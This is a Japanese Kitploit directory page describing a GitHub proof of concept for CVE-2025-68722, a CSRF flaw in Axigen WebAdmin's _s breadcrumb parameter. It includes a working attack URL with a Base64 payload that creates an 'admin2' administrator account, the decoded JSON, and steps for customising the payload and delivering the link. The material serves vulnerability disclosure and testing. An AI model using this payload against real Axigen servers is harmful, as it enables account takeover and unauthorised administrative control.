Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/osmancanvural/cve-2025-68722
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト論文と研究学習と教育
GitHubosmancanvural/cve-2025-68722

CVE-2025-68722

Axigen WebAdmin CSRF脆弱性

リポジトリを見る
17ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-68722: Axigen WebAdmin CSRF

脆弱性の概要

Axigen WebAdmin インターフェースにおける重要な状態変更アクションは、GET リクエスト を介してアクセス可能です。_h トークンは直接的な CSRF から保護しますが、アプリケーションはユーザーが認証した直後に _s (ブレッドクラム) パラメータを介してキューイングされたリクエストを処理します。

攻撃者は、Base64 でエンコードされたペイロードを含む URL を _s パラメータに仕込むことができます。管理者がこのリンクをクリックしてログインプロセスを完了すると、キューイングされたアクションが自動的にそのコンテキスト内で実行されます。

影響を受けるバージョン: < 10.6.26

詳細については、Axigen Knowledge Base を参照してください。


POC

ターゲット URL: https://{axigen-domain}:9443/?_h=invalid&_s=eyJwYWdlIjoiYXVzciIsInBhcmFtcyI6eyJhY3Rpb24iOiJhZGQiLCAidXNlcm5hbWVfaW5wdXQiOiJhZG1pbjIiLCAicGFzc3dvcmRfaW5wdXQiOiJhZG1pbjIiLCAiZGlzcGxheV9uYW1lX2lucHV0IjoiYWRtaW4yIn19

デコードされたペイロード (_s パラメータ):

root@kitploit:~
{"page":"ausr","params":{"action":"add", "username_input":"admin2", "password_input":"admin2", "display_name_input":"admin2"}}

再現手順:

  1. 修正: JSON ペイロードを変更して、異なる管理アクション(例:サーバー設定の変更)をターゲットにします。
  2. エンコード: 変更した JSON を Base64 に再エンコードします。
  3. 配信: 攻撃 URL の _s パラメータの値を置き換え、対象の管理者に配信します。
  4. トリガー: このリンクを介してログインすると、admin2 アカウントが作成されます(またはカスタムアクションが実行されます)。

ツールをダウンロード